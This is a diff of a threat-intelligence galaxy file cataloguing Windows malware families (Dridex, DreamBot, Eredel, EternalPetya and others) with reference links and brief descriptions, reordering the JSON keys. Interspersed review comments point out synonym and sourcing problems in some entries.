"type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", - "value": "DramNudge", - "description": "" + "value": "DramNudge" }, { + "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", "https://lokalhost.pl/gozi_tree.txt", "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", - "value": "DreamBot", - "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information." + "value": "DreamBot" }, { + "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. 
For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", 
@@ -5846,257 +5848,257 @@ "https://viql.github.io/dridex/", "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", - "value": "Dridex", - "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. 
Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"" + "value": "Dridex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", - "value": "DROPSHOT", - "description": "" + "value": "DROPSHOT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", - "value": "DtBackdoor", - "description": "" + "value": "DtBackdoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" + "value": "DualToy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"309d0745-bbfd-43bc-b2c4-511592a475bf", - "value": "DarkHotel", - "description": "" + "value": "DarkHotel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", "https://github.com/ch0sys/DUBrute" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", - "value": "DUBrute", - "description": "" + "value": "DUBrute" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", - "value": "Dumador", - "description": "" + "value": "Dumador" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", - "value": "DuQu", - "description": "" + "value": "DuQu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", - "value": "Duuzer", - "description": "" + "value": "Duuzer" }, { + "description": "", "meta": { - "synonyms": [ - "Dyreza" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", 
"https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf" - ] + ], + "synonyms": [ + "Dyreza" + ], + "type": [] }, "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", - "value": "Dyre", - "description": "" + "value": "Dyre" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", "https://twitter.com/JaromirHorejsi/status/815861135882780673" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", - "value": "EDA2", - "description": "" + "value": "EDA2" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", - "value": "EHDevel", - "description": "" + "value": "EHDevel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", - "value": "Elirks", - "description": "" + "value": "Elirks" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", 
"https://www.joesecurity.org/blog/8409877569366580427" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", - "value": "Elise", - "description": "" + "value": "Elise" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", - "value": "Emdivi", - "description": "" + "value": "Emdivi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", "https://twitter.com/thor_scanner/status/992036762515050496" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", - "value": "Empire Downloader", - "description": "" + "value": "Empire Downloader" }, { + "description": "", "meta": { - "synonyms": [ - "Lurid" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" - ] + ], + "synonyms": [ + "Lurid" + ], + "type": [] }, "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", - "value": "Enfal", - "description": "" + "value": "Enfal" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c4490972-3403-4043-9d61-899c0a440940", - "value": "EquationDrug", - "description": "" + "value": "EquationDrug" }, { + "description": "Rough collection EQGRP samples, to be sorted", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", 
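Review bot: The DarkHotel entry (uuid 309d0745-…) keeps `"synonyms": []` on the new side even though every ref attached to it names the family as Dubnium or Asruex (the Malpedia slug is `win.dubnium_darkhotel`, the Microsoft post is "reverse-engineering-dubnium", the JPCERT post is "asruex-malware…"), so a consumer matching on `value` or `synonyms` will not link "Dubnium"/"Asruex" indicators to this cluster. If the upstream Malpedia record lists them as aliases, `"synonyms": ["Dubnium", "Asruex"]` would make the entry usable for lookups; "DarkHotel" itself is more commonly the actor name than the malware name, so keeping it as `value` is worth a second look. This is pre-existing data the reorder carries forward, not something the commit introduced. The hunk's enclosing `values` array starts before this chunk.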
@@ -6108,52 +6110,42 @@ "https://laanwj.github.io/2016/09/01/tadaqueos.html", "https://laanwj.github.io/2016/08/28/feintcloud.html", "https://laanwj.github.io/2016/08/22/blatsting.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", - "value": "Equationgroup (Sorting)", - "description": "Rough collection EQGRP samples, to be sorted" + "value": "Equationgroup (Sorting)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "" + "value": "Erebus" }, { + "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. 
Supports any formats, configurable via telegram-bot", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", - "value": "Eredel", - "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot" + "value": "Eredel" }, { + "description": "", "meta": { - "synonyms": [ - "ExPetr", - "Pnyetya", - "Petna", - "NotPetya", - "Nyetya", - "NonPetya", - "nPetya", - "Diskcoder.C", - "BadRabbit" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", "https://securelist.com/schroedingers-petya/78870/", 
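Review bot: The Eredel entry's second ref is a Google web-cache URL (`webcache.googleusercontent.com/search?q=cache:…:hXXps://www.nulled.to/…`) wrapping a defanged link to a cybercrime-forum sales thread, and cache URLs of that kind are ephemeral, so the only non-Malpedia source for this cluster is likely to go dead; an archived snapshot (e.g. an archive.org capture) would be a more durable reference if one exists. The description is also a near-verbatim copy of the seller's advertisement ("According to nulled[.]to: … Supports any formats, configurable via telegram-bot"), which is fine as provenance but should not be read as an analyst-verified capability list; a short qualifier such as "capabilities as advertised by the seller, not independently verified" would make that explicit. The `hXXps` defanging inside the query string is intentional and should stay.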
@@ -6190,333 +6182,341 @@ "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html" - ] + ], + "synonyms": [ + "ExPetr", + "Pnyetya", + "Petna", + "NotPetya", + "Nyetya", + "NonPetya", + "nPetya", + "Diskcoder.C", + "BadRabbit" + ], + "type": [] }, "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", - "value": "EternalPetya", - "description": "" + "value": "EternalPetya" }, { + "description": "", "meta": { - "synonyms": [ - "HighTide" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] + ], + "synonyms": [ + "HighTide" + ], + "type": [] }, "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", - "value": "EtumBot", - "description": "" + "value": "EtumBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", "https://www.cyphort.com/evilbunny-malware-instrumented-lua/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", - "value": "Evilbunny", - "description": "" + "value": "Evilbunny" }, { + "description": "", "meta": { - "synonyms": [ - "Vidgrab" - ], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" - ] + ], + "synonyms": [ + "Vidgrab" + ], + "type": [] }, "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", - "value": "EvilGrab", - "description": "" + "value": "EvilGrab" }, { + "description": "Privately modded version of the Pony stealer.", "meta": { - "synonyms": [ - "CREstealer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/", "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/" - ] + ], + "synonyms": [ + "CREstealer" + ], + "type": [] }, "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", - "value": "EvilPony", - "description": "Privately modded version of the Pony stealer." 
+ "value": "EvilPony" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", - "value": "Evrial", - "description": "" + "value": "Evrial" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", + "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" + ], "synonyms": [ "Sabresac", "Saber" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", - "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" - ] + "type": [] }, "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", - "value": "Excalibur", - "description": "" + "value": "Excalibur" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://github.com/nccgroup/Royal_APT" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "74f8db32-799c-41e5-9815-6272908ede57", - "value": "MS Exchange Tool", - "description": "" + "value": "MS Exchange Tool" }, { + "description": "", "meta": { - "synonyms": [ - "ExtRat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", 
"https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" - ] + ], + "synonyms": [ + "ExtRat" + ], + "type": [] }, "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", - "value": "Xtreme RAT", - "description": "" + "value": "Xtreme RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", "http://blog.talosintel.com/2017/01/Eye-Pyramid.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", - "value": "Eye Pyramid", - "description": "" + "value": "Eye Pyramid" }, { + "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).", "meta": { - "synonyms": [ - "WillExec" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", "https://github.com/360netlab/DGA/issues/36", "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "http://www.freebuf.com/column/153424.html" - ] + ], + "synonyms": [ + "WillExec" + ], + "type": [] }, "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", - "value": "FakeDGA", - "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API)." 
+ "value": "FakeDGA" }, { + "description": "", "meta": { - "synonyms": [ - "Braviax" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" - ] + ], + "synonyms": [ + "Braviax" + ], + "type": [] }, "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", - "value": "FakeRean", - "description": "" + "value": "FakeRean" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", - "value": "FakeTC", - "description": "" + "value": "FakeTC" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", - "value": "Fanny", - "description": "" + "value": "Fanny" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", - "value": "FantomCrypt", - "description": "" + "value": "FantomCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", 
"http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", - "value": "FastPOS", - "description": "" + "value": "FastPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", - "value": "Felismus", - "description": "" + "value": "Felismus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", - "value": "Felixroot", - "description": "" + "value": "Felixroot" }, { + "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.", "meta": { - "synonyms": [ - "Cridex", - "Bugat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", "https://feodotracker.abuse.ch/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", 
"http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" - ] + ], + "synonyms": [ + "Cridex", + "Bugat" + ], + "type": [] }, "uuid": "66781866-f064-467d-925d-5e5f290352f0", - "value": "Feodo", - "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials." + "value": "Feodo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", - "value": "FF RAT", - "description": "" + "value": "FF RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", - "value": "FileIce", - "description": "" + "value": "FileIce" }, { + "description": "", "meta": { - "synonyms": [ - "Poseidon" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", "https://blogs.cisco.com/security/talos/poseidon" - ] + ], + "synonyms": [ + "Poseidon" + ], + "type": [] }, "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", - "value": "FindPOS", - "description": "" + "value": "FindPOS" }, { + "description": "", "meta": { - "synonyms": [ - "FinSpy" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", 
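Review bot: The EternalPetya entry (uuid 6f736038-…) lists `"BadRabbit"` among its synonyms alongside ExPetr/NotPetya/Nyetya/Diskcoder.C, but BadRabbit is generally tracked as a distinct family that reuses NotPetya code rather than as an alias of it — one of the refs in this very hunk is titled "the-big-difference-with-bad-rabbit". Treating it as a synonym means any BadRabbit indicator or report gets tagged as NotPetya, which muddies attribution and timeline (October 2017 vs June 2017). If the upstream Malpedia `win.eternal_petya` record does not list BadRabbit as an alias, it would be cleaner to drop it from `synonyms` and express the link as a `related` entry with `"type": "similar"`, as other clusters in this file do. Pre-existing data that the key reorder carries forward, not introduced here.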
